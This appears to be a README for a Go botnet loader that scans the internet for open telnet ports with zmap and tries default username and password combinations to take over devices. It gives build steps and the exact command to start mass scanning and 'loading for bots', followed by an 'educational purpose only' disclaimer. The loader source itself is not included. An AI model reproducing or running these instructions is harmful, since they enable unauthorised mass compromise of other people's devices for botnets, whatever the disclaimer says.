A in go written loader for using default credentials on public telnet servers!
The loader uses zmap for getting valid telnet ip addresses on port 23 and golang for trying default username + password combinations.
- Build the loader.go, for this you need to have golang on your system installed
cd ./loader && go build ./loader.go-
Install zmap using their guide
-
Start Scanning/Loading for bots
ulimit -u999999; ulimit -n999999; zmap -p23 | ./loader
⚠️ This tool is for educational purpose only, The author is not responsible for any damage caused by running this script. Use it responsibly and avoid running it on production systems or devices you cannot afford to disrupt. Using this code to intentionally infect devices without consent may be illegal.⚠️